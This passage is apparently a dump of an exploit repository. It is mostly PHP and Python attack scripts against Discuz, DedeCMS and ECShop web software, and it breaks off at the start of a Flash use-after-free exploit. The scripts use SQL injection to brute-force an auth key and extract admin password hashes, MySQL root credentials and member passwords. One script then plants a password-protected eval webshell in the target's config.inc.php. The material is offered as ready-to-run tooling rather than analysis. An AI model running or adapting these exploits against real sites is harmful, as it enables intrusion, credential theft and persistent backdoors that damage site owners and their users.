Get\r\n"; 113 | } 114 | } 115 | 116 | function counts($hostname,$path) 117 | { 118 | $tmp = array(); 119 | $exit = 0; 120 | while ($exit==0) 121 | { 122 | $response = exploit($hostname, $path,1,1,1); 123 | //echo $response; 124 | if (preg_match("/\[(.*?)\]/i",$response,$tmp)) 125 | { 126 | $exit = 1; 127 | return $tmp[1]; 128 | } 129 | else 130 | return "Can't Get\r\n"; 131 | } 132 | } 133 | 134 | function GetDBUser($hostname,$path,$c) 135 | { 136 | $tmp = array(); 137 | $exit = 0; 138 | while ($exit==0) 139 | 
{ 140 | $response = exploit($hostname, $path,1,$c-1,5); 141 | if (preg_match("/\'\d(.*?)\'/i",$response,$tmp)) 142 | { 143 | $exit = 1; 144 | return $tmp[1]; 145 | } 146 | else 147 | return "Can't Get\r\n"; 148 | } 149 | } 150 | 151 | function GetUser($hostname,$path,$c) 152 | { 153 | $tmp = array(); 154 | $exit = 0; 155 | while ($exit==0) 156 | { 157 | $response = exploit($hostname, $path,1,$c-1,2); 158 | if (preg_match("/\'\d(.*?)\'/i",$response,$tmp)) 159 | { 160 | $exit = 1; 161 | return $tmp[1]; 162 | } 163 | else 164 | return "Can't Get\r\n"; 165 | } 166 | } 167 | 168 | /////////////////////////////////////////////////////////////////// 169 | /////////////////////////////////////////////////////////////////// 170 | 171 | if ($argc != 3) 172 | usage(); 173 | $hostname = $argv[1]; 174 | $path = $argv[2]; 175 | echo "[+] =======================================================\n"; 176 | echo "[+] Pre: "; 177 | ob_flush(); 178 | flush(); 179 | $pre=GetPre($hostname, $path); 180 | echo $pre."\n"; 181 | echo "[+] DbCount: "; 182 | ob_flush(); 183 | flush(); 184 | $dbcount=dbcounts($hostname, $path); 185 | echo $dbcount."\n"; 186 | /////////////////////////////////////////////////////////////////// 187 | $c=1; 188 | /////////////////////////////////////////////////////////////////// 189 | while($c<=$dbcount){ 190 | echo "[+] <".($c).">\r\n"; 191 | ob_flush(); 192 | flush(); 193 | $dbuser=GetDBUser($hostname,$path,$c); 194 | echo $dbuser."\n"; 195 | $c++; 196 | } 197 | /////////////////////////////////////////////////////////////////// 198 | echo "[+] Admin@Count: "; 199 | ob_flush(); 200 | flush(); 201 | $count=counts($hostname, $path); 202 | echo $count."\n"; 203 | ob_flush(); 204 | flush(); 205 | /////////////////////////////////////////////////////////////////// 206 | $c=1; 207 | /////////////////////////////////////////////////////////////////// 208 | while($c<=$count){ 209 | echo "[+] <".($c).">\r\n"; 210 | ob_flush(); 211 | flush(); 212 | 
$user=GetUser($hostname,$path,$c); 213 | echo $user."\n"; 214 | $c++; 215 | } 216 | /////////////////////////////////////////////////////////////////// 217 | ?> -------------------------------------------------------------------------------- /dede/dedecms v55漏洞利用.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dede/dedecms v55漏洞利用.htm -------------------------------------------------------------------------------- /dede/dede注入导出.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dede/dede注入导出.html -------------------------------------------------------------------------------- /dz/discuz.php: -------------------------------------------------------------------------------- 1 | 126 )) 38 | {$result.=" .";} 39 | else 40 | {$result.=" ".$string[$i];} 41 | if (strlen(dechex(ord($string[$i])))==2) 42 | {$exa.=" ".dechex(ord($string[$i]));} 43 | else 44 | {$exa.=" 0".dechex(ord($string[$i]));} 45 | $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} 46 | } 47 | return $exa."\r\n".$result; 48 | } 49 | $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; 50 | 51 | function sendpacketii($packet) 52 | { 53 | global $proxy, $host, $port, $html, $proxy_regex; 54 | if ($proxy=='') { 55 | $ock=fsockopen(gethostbyname($host),$port); 56 | if (!$ock) { 57 | echo 'No response from '.$host.':'.$port; die; 58 | } 59 | } 60 | else { 61 | $c = preg_match($proxy_regex,$proxy); 62 | if (!$c) { 63 | echo 'Not a valid proxy...';die; 64 | } 65 | $parts=explode(':',$proxy); 66 | echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; 67 | $ock=fsockopen($parts[0],$parts[1]); 68 | if (!$ock) { 69 | echo 'No response from proxy...';die; 70 | } 71 | } 72 | fputs($ock,$packet); 73 | if ($proxy=='') { 74 | $html=''; 75 | while (!feof($ock)) { 76 | $html.=fgets($ock); 77 | } 78 | } 79 | else { 80 | $html=''; 81 | while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { 82 | $html.=fread($ock,1); 83 | } 84 | } 85 | fclose($ock); 86 | } 87 | 88 | $host=$argv[1]; 89 | $path=$argv[2]; 90 | $port=80; 91 | $proxy=""; 92 | for ($i=3; $i<$argc; $i++){ 93 | $temp=$argv[$i][0].$argv[$i][1]; 94 | if ($temp=="-p") 95 | { 96 | $port=str_replace("-p","",$argv[$i]); 97 | } 98 | if ($temp=="-P") 99 | { 100 | $proxy=str_replace("-P","",$argv[$i]); 101 | } 102 | } 103 | if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 104 | if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 105 | 106 | echo "please wait...\n"; 107 | 108 | //from global.func.php 109 | function authcode($string, $operation, $key = '') { 110 | $key = $key ? $key : $GLOBALS['discuz_auth_key']; 111 | $coded = ''; 112 | $keylength = 32; 113 | $string = $operation == 'DECODE' ? base64_decode($string) : $string; 114 | for($i = 0; $i < strlen($string); $i += 32) { 115 | $coded .= substr($string, $i, 32) ^ $key; 116 | } 117 | $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded; 118 | return $coded; 119 | } 120 | 121 | //stolen from install.php 122 | function random($length) { 123 | $hash = ''; 124 | $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; 125 | $max = strlen($chars) - 1; 126 | mt_srand((double)microtime() * 1000000); 127 | for($i = 0; $i < $length; $i++) { 128 | $hash .= $chars[mt_rand(0, $max)]; 129 | } 130 | return $hash; 131 | } 132 | 133 | $agent="Googlebot/2.1"; 134 | //see sql errors... 
you need auth key, 135 | //it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;) 136 | $tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);} 137 | while (1) 138 | { 139 | $discuz_auth_key=random(32); 140 | $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n"; 141 | $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof 142 | $packet.="User-Agent: $agent\r\n"; 143 | $packet.="Host: ".$host."\r\n"; 144 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n"; 145 | $packet.="Accept: text/plain\r\n"; 146 | $packet.="Connection: Close\r\n\r\n"; 147 | $packet.=$data; 148 | sendpacketii($packet); 149 | $html=html_entity_decode($html); 150 | $html=str_replace("
","",$html); 151 | $t=explode("AND m.password='",$html); 152 | $t2=explode("' ",$t[1]); 153 | $pwd_f=$t2[0]; 154 | $t=explode("AND m.secques='",$html); 155 | $t2=explode("'\n",$t[1]); 156 | $secques_f=$t2[0]; 157 | $t=explode("AND m.uid='",$html); 158 | $t2=explode("'\x0d",$t[1]); 159 | $uid_f=$t2[0]; 160 | $my_string=$pwd_f."\t".$secques_f."\t".$uid_f; 161 | if ((strlen($my_string)==270) and (!eregi("=",$my_string))){ 162 | break; 163 | } 164 | } 165 | $temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE"); 166 | //calculating key... 167 | $key=""; 168 | for ($j=0; $j<32; $j++){ 169 | for ($i=0; $i<255; $i++){ 170 | $aa=""; 171 | if ($j<>0){ 172 | for ($k=1; $k<=$j; $k++){ 173 | $aa.="a"; 174 | } 175 | } 176 | $GLOBALS['discuz_auth_key']=$aa.chr($i); 177 | $t = authcode($temp,"DECODE"); 178 | if ($t[$j]==$my_string[$j]){ 179 | $key.=chr($i); 180 | } 181 | } 182 | } 183 | 184 | //echo "AUTH KEY ->".$key."\r\n"; 185 | $GLOBALS['discuz_auth_key']=$key; 186 | 187 | echo "pwd hash (md5) -> "; 188 | $chars[0]=0;//null 189 | $chars=array_merge($chars,range(48,57)); //numbers 190 | $chars=array_merge($chars,range(97,102));//a-f letters 191 | $j=1;$password=""; 192 | while (!strstr($password,chr(0))) 193 | { 194 | for ($i=0; $i<=255; $i++) 195 | { 196 | if (in_array($i,$chars)) 197 | { 198 | //you can use every char because of base64_decode()...so this bypass magic quotes... 
199 | //and some help by extract() to overwrite vars 200 | $sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*"; 201 | $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n"; 202 | $packet.="User-Agent: $agent\r\n"; 203 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 204 | $packet.="Host: ".$host."\r\n"; 205 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n"; 206 | $packet.="Accept: text/plain\r\n"; 207 | $packet.="Connection: Close\r\n\r\n"; 208 | $packet.=$data; 209 | sendpacketii($packet); 210 | if (eregi("action=groupexpiry",$html)){ 211 | $password.=chr($i);echo chr($i);sleep(1);break; 212 | } 213 | } 214 | if ($i==255) { 215 | die("\nExploit failed..."); 216 | } 217 | } 218 | $j++; 219 | } 220 | 221 | echo "\nadmin user -> "; 222 | $j=1;$admin=""; 223 | while (!strstr($admin,chr(0))) 224 | { 225 | for ($i=0; $i<=255; $i++) 226 | { 227 | $sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*"; 228 | $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n"; 229 | $packet.="User-Agent: $agent\r\n"; 230 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 231 | $packet.="Host: ".$host."\r\n"; 232 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n"; 233 | $packet.="Accept: text/plain\r\n"; 234 | $packet.="Connection: Close\r\n\r\n"; 235 | $packet.=$data; 236 | sendpacketii($packet); 237 | if 
(eregi("action=groupexpiry",$html)){ 238 | $admin.=chr($i);echo chr($i);sleep(1);break; 239 | } 240 | if ($i==255) {die("\nExploit failed...");} 241 | } 242 | $j++; 243 | } 244 | 245 | function is_hash($hash) 246 | { 247 | if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} 248 | else {return false;} 249 | } 250 | 251 | if (is_hash($password)) { 252 | echo "exploit succeeded..."; 253 | } 254 | else { 255 | echo "exploit failed..."; 256 | } 257 | ?> 258 | -------------------------------------------------------------------------------- /dz/discuz4.1.php: -------------------------------------------------------------------------------- 1 | 126 )) 36 | {$result.=" .";} 37 | else 38 | {$result.=" ".$string[$i];} 39 | if (strlen(dechex(ord($string[$i])))==2) 40 | {$exa.=" ".dechex(ord($string[$i]));} 41 | else 42 | {$exa.=" 0".dechex(ord($string[$i]));} 43 | $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} 44 | } 45 | return $exa."\r\n".$result; 46 | } 47 | $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; 48 | 49 | function sendpacketii($packet) 50 | { 51 | global $proxy, $host, $port, $html, $proxy_regex; 52 | if ($proxy=='') { 53 | $ock=fsockopen(gethostbyname($host),$port); 54 | if (!$ock) { 55 | echo 'No response from '.$host.':'.$port; die; 56 | } 57 | } 58 | else { 59 | $c = preg_match($proxy_regex,$proxy); 60 | if (!$c) { 61 | echo 'Not a valid proxy...';die; 62 | } 63 | $parts=explode(':',$proxy); 64 | echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; 65 | $ock=fsockopen($parts[0],$parts[1]); 66 | if (!$ock) { 67 | echo 'No response from proxy...';die; 68 | } 69 | } 70 | fputs($ock,$packet); 71 | if ($proxy=='') { 72 | $html=''; 73 | while (!feof($ock)) { 74 | $html.=fgets($ock); 75 | } 76 | } 77 | else { 78 | $html=''; 79 | while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { 80 | $html.=fread($ock,1); 81 | } 82 | } 83 | fclose($ock); 84 | } 85 | 86 | $host=$argv[1]; 87 | $path=$argv[2]; 88 | $port=80; 89 | $proxy=""; 90 | for ($i=3; $i<$argc; $i++){ 91 | $temp=$argv[$i][0].$argv[$i][1]; 92 | if ($temp=="-p") 93 | { 94 | $port=str_replace("-p","",$argv[$i]); 95 | } 96 | if ($temp=="-P") 97 | { 98 | $proxy=str_replace("-P","",$argv[$i]); 99 | } 100 | } 101 | if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 102 | if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 103 | 104 | echo "please wait...\n"; 105 | 106 | //from global.func.php 107 | function authcode($string, $operation, $key = '') { 108 | $key = $key ? $key : $GLOBALS['discuz_auth_key']; 109 | $coded = ''; 110 | $keylength = 32; 111 | $string = $operation == 'DECODE' ? base64_decode($string) : $string; 112 | for($i = 0; $i < strlen($string); $i += 32) { 113 | $coded .= substr($string, $i, 32) ^ $key; 114 | } 115 | $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded; 116 | return $coded; 117 | } 118 | 119 | //stolen from install.php 120 | function random($length) { 121 | $hash = ''; 122 | $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; 123 | $max = strlen($chars) - 1; 124 | mt_srand((double)microtime() * 1000000); 125 | for($i = 0; $i < $length; $i++) { 126 | $hash .= $chars[mt_rand(0, $max)]; 127 | } 128 | return $hash; 129 | } 130 | 131 | $agent="Googlebot/2.1"; 132 | //see sql errors... 
you need auth key, 133 | //it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;) 134 | $tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);} 135 | while (1) 136 | { 137 | $discuz_auth_key=random(32); 138 | $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n"; 139 | $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof 140 | $packet.="User-Agent: $agent\r\n"; 141 | $packet.="Host: ".$host."\r\n"; 142 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n"; 143 | $packet.="Accept: text/plain\r\n"; 144 | $packet.="Connection: Close\r\n\r\n"; 145 | $packet.=$data; 146 | sendpacketii($packet); 147 | $html=html_entity_decode($html); 148 | $html=str_replace("
","",$html); 149 | $t=explode("AND m.password='",$html); 150 | $t2=explode("' ",$t[1]); 151 | $pwd_f=$t2[0]; 152 | $t=explode("AND m.secques='",$html); 153 | $t2=explode("'\n",$t[1]); 154 | $secques_f=$t2[0]; 155 | $t=explode("AND m.uid='",$html); 156 | $t2=explode("'\x0d",$t[1]); 157 | $uid_f=$t2[0]; 158 | $my_string=$pwd_f."\t".$secques_f."\t".$uid_f; 159 | if ((strlen($my_string)==270) and (!eregi("=",$my_string))){ 160 | break; 161 | } 162 | } 163 | $temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE"); 164 | //calculating key... 165 | $key=""; 166 | for ($j=0; $j<32; $j++){ 167 | for ($i=0; $i<255; $i++){ 168 | $aa=""; 169 | if ($j<>0){ 170 | for ($k=1; $k<=$j; $k++){ 171 | $aa.="a"; 172 | } 173 | } 174 | $GLOBALS['discuz_auth_key']=$aa.chr($i); 175 | $t = authcode($temp,"DECODE"); 176 | if ($t[$j]==$my_string[$j]){ 177 | $key.=chr($i); 178 | } 179 | } 180 | } 181 | 182 | //echo "AUTH KEY ->".$key."\r\n"; 183 | $GLOBALS['discuz_auth_key']=$key; 184 | 185 | echo "pwd hash (md5) -> "; 186 | $chars[0]=0;//null 187 | $chars=array_merge($chars,range(48,57)); //numbers 188 | $chars=array_merge($chars,range(97,102));//a-f letters 189 | $j=1;$password=""; 190 | while (!strstr($password,chr(0))) 191 | { 192 | for ($i=0; $i<=255; $i++) 193 | { 194 | if (in_array($i,$chars)) 195 | { 196 | //you can use every char because of base64_decode()...so this bypass magic quotes... 
197 | //and some help by extract() to overwrite vars 198 | $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*"; 199 | $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n"; 200 | $packet.="User-Agent: $agent\r\n"; 201 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 202 | $packet.="Host: ".$host."\r\n"; 203 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n"; 204 | $packet.="Accept: text/plain\r\n"; 205 | $packet.="Connection: Close\r\n\r\n"; 206 | $packet.=$data; 207 | sendpacketii($packet); 208 | if (eregi("action=groupexpiry",$html)){ 209 | $password.=chr($i);echo chr($i);sleep(1);break; 210 | } 211 | } 212 | if ($i==255) { 213 | die("\nExploit failed..."); 214 | } 215 | } 216 | $j++; 217 | } 218 | 219 | echo "\nadmin user -> "; 220 | $j=1;$admin=""; 221 | while (!strstr($admin,chr(0))) 222 | { 223 | for ($i=0; $i<=255; $i++) 224 | { 225 | $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*"; 226 | $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n"; 227 | $packet.="User-Agent: $agent\r\n"; 228 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 229 | $packet.="Host: ".$host."\r\n"; 230 | $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n"; 231 | $packet.="Accept: text/plain\r\n"; 232 | $packet.="Connection: Close\r\n\r\n"; 233 | $packet.=$data; 234 | sendpacketii($packet); 235 | if (eregi("action=groupexpiry",$html)){ 236 | $admin.=chr($i);echo chr($i);sleep(1);break; 237 | } 238 | if ($i==255) {die("\nExploit failed...");} 239 | } 240 | $j++; 241 | } 242 | 243 
| function is_hash($hash) 244 | { 245 | if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} 246 | else {return false;} 247 | } 248 | 249 | if (is_hash($password)) { 250 | echo "exploit succeeded..."; 251 | } 252 | else { 253 | echo "exploit failed..."; 254 | } 255 | ?> 256 | -------------------------------------------------------------------------------- /dz/dz7-2getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: gbk -*- 3 | # -*- coding: gb2312 -*- 4 | # -*- coding: utf_8 -*- 5 | # author iswin 6 | import sys 7 | import hashlib 8 | import time 9 | import math 10 | import base64 11 | import urllib2 12 | import urllib 13 | import re 14 | 15 | def sendRequest(url,para): 16 | try: 17 | data = urllib.urlencode(para) 18 | req=urllib2.Request(url,data) 19 | res=urllib2.urlopen(req,timeout=20).read() 20 | except Exception, e: 21 | print 'Exploit Failed!\n%s'%(e) 22 | exit(0); 23 | return res 24 | 25 | def getTablePrefix(url): 26 | print 'Start GetTablePrefix...' 27 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 28 | res=sendRequest(url,para); 29 | pre=re.findall("Duplicate entry '(.*?)'",res); 30 | if len(pre)==0: 31 | print 'Exploit Failed!' 
32 | exit(0); 33 | table_pre=pre[0][:len(pre[0])-1].decode('hex') 34 | table_pre=table_pre[0:table_pre.index('_')] 35 | print 'Table_pre:%s'%(table_pre) 36 | return table_pre 37 | 38 | def getCurrentUser(url): 39 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 40 | res=sendRequest(url,para) 41 | pre=re.findall("Duplicate entry '(.*?)'",res) 42 | if len(pre)==0: 43 | print 'Exploit Failed!' 44 | exit(0); 45 | table_pre=pre[0][:len(pre[0])-1] 46 | print 'Current User:%s'%(table_pre) 47 | return table_pre 48 | 49 | def getUcKey(url): 50 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 51 | para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 52 | res=sendRequest(url,para); 53 | res1=sendRequest(url,para1); 54 | key1=re.findall("Duplicate entry '(.*?)'",res) 55 | key2=re.findall("Duplicate entry '(.*?)'",res1) 56 | if len(key1)==0: 57 | print 'Get Uc_Key Failed!' 58 | return '' 59 | key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1] 60 | print 'uc_key:%s'%(key) 61 | return key 62 | 63 | def getRootUser(url): 64 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'} 65 | res=sendRequest(url,para); 66 | pre=re.findall("Duplicate entry '(.*?)'",res) 67 | if len(pre)==0: 68 | print 'Exploit Failed!' 
69 | exit(0); 70 | table_pre=pre[0][:len(pre[0])-1].split(' ') 71 | print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1]) 72 | 73 | def dumpData(url,table_prefix,count): 74 | para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)} 75 | res=sendRequest(url,para); 76 | datas=re.findall("Duplicate entry '(.*?)'",res) 77 | if len(datas)==0: 78 | print 'Exploit Failed!' 79 | exit(0) 80 | cleandata=datas[0][:len(datas[0])-1] 81 | info=cleandata.split(' ') 82 | print 'user:%s pass:%s'%(info[0],info[1]) 83 | 84 | def microtime(get_as_float = False) : 85 | if get_as_float: 86 | return time.time() 87 | else: 88 | return '%.8f %d' % math.modf(time.time()) 89 | 90 | def get_authcode(string, key = ''): 91 | ckey_length = 4 92 | key = hashlib.md5(key).hexdigest() 93 | keya = hashlib.md5(key[0:16]).hexdigest() 94 | keyb = hashlib.md5(key[16:32]).hexdigest() 95 | keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:] 96 | cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 97 | key_length = len(cryptkey) 98 | string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string 99 | string_length = len(string) 100 | result = '' 101 | box = range(0, 256) 102 | rndkey = dict() 103 | for i in range(0,256): 104 | rndkey[i] = ord(cryptkey[i % key_length]) 105 | j=0 106 | for i in range(0,256): 107 | j = (j + box[i] + rndkey[i]) % 256 108 | tmp = box[i] 109 | box[i] = box[j] 110 | box[j] = tmp 111 | a=0 112 | j=0 113 | for i in range(0,string_length): 114 | a = (a + 1) % 256 115 | j = (j + box[a]) % 256 116 | tmp = box[a] 117 | box[a] = box[j] 118 | box[j] = tmp 119 | result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) 120 | return keyc + base64.b64encode(result).replace('=', '') 121 | 122 | def get_shell(url,key,host): 123 | 
headers={'Accept-Language':'zh-cn', 124 | 'Content-Type':'application/x-www-form-urlencoded', 125 | 'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)', 126 | 'Referer':url 127 | } 128 | tm = time.time()+10*3600 129 | tm="time=%d&action=updateapps" %tm 130 | code = urllib.quote(get_authcode(tm,key)) 131 | url=url+"?code="+code 132 | data1=''' 133 | 134 | http://xxx\');eval($_POST[3]);// 135 | ''' 136 | try: 137 | req=urllib2.Request(url,data=data1,headers=headers) 138 | ret=urllib2.urlopen(req) 139 | except: 140 | return "Exploit Falied" 141 | data2=''' 142 | 143 | http://aaa 144 | ''' 145 | try: 146 | req=urllib2.Request(url,data=data2,headers=headers) 147 | ret=urllib2.urlopen(req) 148 | except: 149 | return "error" 150 | 151 | try: 152 | req=urllib2.Request(host+'/config.inc.php') 153 | res=urllib2.urlopen(req,timeout=20).read() 154 | except Exception, e: 155 | print 'GetWebshell Failed,%s'%(e) 156 | return 157 | print "webshell:"+host+"/config.inc.php,password:3" 158 | 159 | if __name__ == '__main__': 160 | print 'DZ7.x Exp Code By iswin' 161 | if len(sys.argv)<3: 162 | print 'DZ7.x Exp Code By iswin\nusage:python dz7.py http://www.iswin.org 10' 163 | exit(0) 164 | url=sys.argv[1]+'/faq.php' 165 | count=int(sys.argv[2]) 166 | user=getCurrentUser(url) 167 | if user.startswith('root@'): 168 | getRootUser(url) 169 | uc_key=getUcKey(url) 170 | if len(uc_key)==64: 171 | print 'Start GetWebshell...' 172 | get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1]) 173 | tb_pre=getTablePrefix(url) 174 | print 'Start DumpData...' 
175 | for x in xrange(0,count): 176 | dumpData(url,tb_pre,x) 177 | -------------------------------------------------------------------------------- /dz/faqgetshell.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dz/faqgetshell.py -------------------------------------------------------------------------------- /dz/uckeygetshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dz/uckeygetshell.php -------------------------------------------------------------------------------- /ecshop/ECSHOP各版本注入通杀漏洞.htm: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | Ecshop SQL Injection Exp [4 Fucker Team] 5 |
-------------------------------------------------------------------------------- /ecshop/全版本注入exp.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ecshop/全版本注入exp.html -------------------------------------------------------------------------------- /ecshop/要注册账号ECSHOP各版本注入通杀漏洞.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/ecshop/要注册账号ECSHOP各版本注入通杀漏洞.html -------------------------------------------------------------------------------- /fcgi_exp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/fcgi_exp.zip -------------------------------------------------------------------------------- /flash0day/calc.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 | -------------------------------------------------------------------------------- /flash0day/exp1/MyClass.as: -------------------------------------------------------------------------------- 1 | package 2 | { 3 | import flash.display.DisplayObjectContainer; 4 | import fl.controls.Button; 5 | import fl.controls.TextArea; 6 | import flash.utils.ByteArray; 7 | import flash.system.Capabilities; 8 | import flash.events.MouseEvent; 9 | import flash.external.ExternalInterface; 10 | 11 | 12 | public class MyClass 13 | { 14 | static var 15 | _log:TextArea, 16 | _gc:Array, 17 | _va:Array, 18 | _ba:ByteArray, 19 | _isDbg:Boolean = Capabilities.isDebugger; 20 | 21 | // prints text message into the text area 22 | static function logAdd(str:String):void 23 | { 24 | _log.htmlText += "
" + str;
 25 | 		}
 26 | 		
 27 | 		// define malicious valueOf()
		// Runs while TryExpl() is in the middle of `_ba[3] = new MyClass()`: per the
		// "call valueOf() and cause UaF" comment there, the store coerces the object to
		// a number via valueOf(), so everything below happens between the caller
		// picking its target ByteArray and the write of the returned byte.
		prototype.valueOf = function ()
		{
